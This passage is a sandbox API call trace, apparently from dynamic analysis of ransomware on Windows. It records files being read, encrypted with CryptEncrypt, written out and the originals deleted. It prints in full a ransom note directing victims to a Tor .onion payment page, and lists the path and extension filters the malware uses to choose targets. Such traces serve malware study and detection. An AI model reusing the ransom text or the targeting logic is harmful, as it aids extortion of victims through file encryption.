lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.299] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.299] GetLastError () returned 0x0 [0161.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.300] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.300] GetLastError () returned 0x0 [0161.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.300] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.300] GetLastError () returned 0x0 [0161.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.300] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.300] GetLastError () returned 0x0 [0161.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.300] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.300] GetLastError () returned 0x0 [0161.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.300] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui")) returned 0x20 [0161.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.301] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 1 [0161.301] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui")) returned 0 [0161.301] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" [0161.301] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 1 [0161.301] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\.xXE977.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\.xxe977.tmp")) returned 0xe977 [0161.302] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\.xXE977.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\.xxe977.tmp"), dwFlags=0x1) returned 0 [0161.302] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\.xXE977.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\.xxe977.tmp")) returned 1 [0161.302] CryptDestroyKey (hKey=0x9ad138) returned 1 [0161.302] wcslen (_String="OK") returned 0x2 [0161.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.302] CryptDestroyKey (hKey=0x9ad738) returned 1 [0161.302] CryptDestroyHash (hHash=0x9ad338) returned 1 [0161.302] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0161.302] FindNextFileW (in: hFindFile=0x9ad278, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.302] GetLastError () returned 0x12 [0161.302] FindClose (in: hFindFile=0x9ad278 | out: hFindFile=0x9ad278) returned 1 [0161.304] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.304] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.304] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.305] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.305] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.exe") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.dll") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.lnk") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.bat") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.ini") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.msi") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*.scf") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*pagefile.sys*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*AppData*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\winrar\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\java\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\windows\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\ESET\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\AVG\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*Atheros*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*Realtek*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*bootmgr*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*boot*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*boot*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*IO.SYS*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*ntldr*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*chrome*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*opera*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", pszSpec="*firefox*") returned 0 [0161.306] wcslen (_String="\\\\?\\") returned 0x4 [0161.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad5f8 [0161.306] wcscmp (_String1=".", _String2=".") returned 0 [0161.306] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.306] wcscmp (_String1="..", _String2=".") returned 1 [0161.306] wcscmp (_String1="..", _String2="..") returned 0 [0161.306] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.306] wcscmp (_String1="en-US", _String2=".") returned 1 [0161.306] wcscmp (_String1="en-US", _String2="..") returned 1 [0161.306] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.306] PathMatchSpecW (pszFile="msinfo32.exe", pszSpec="*NMCRYPT") returned 0 [0161.306] PathMatchSpecW (pszFile="msinfo32.exe", pszSpec="*Recovers your files.html") returned 0 [0161.306] PathMatchSpecW (pszFile="msinfo32.exe", pszSpec="*.exe") returned 1 [0161.306] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0161.306] GetLastError () returned 0x12 [0161.306] FindClose (in: hFindFile=0x9ad5f8 | out: hFindFile=0x9ad5f8) returned 1 [0161.306] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.306] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.306] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.306] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.306] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.306] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.306] wcslen (_String="\\\\?\\") returned 0x4 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.exe") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.dll") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.lnk") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.bat") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.ini") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.msi") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*.scf") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*AppData*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*Atheros*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*Realtek*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*boot*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*boot*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program 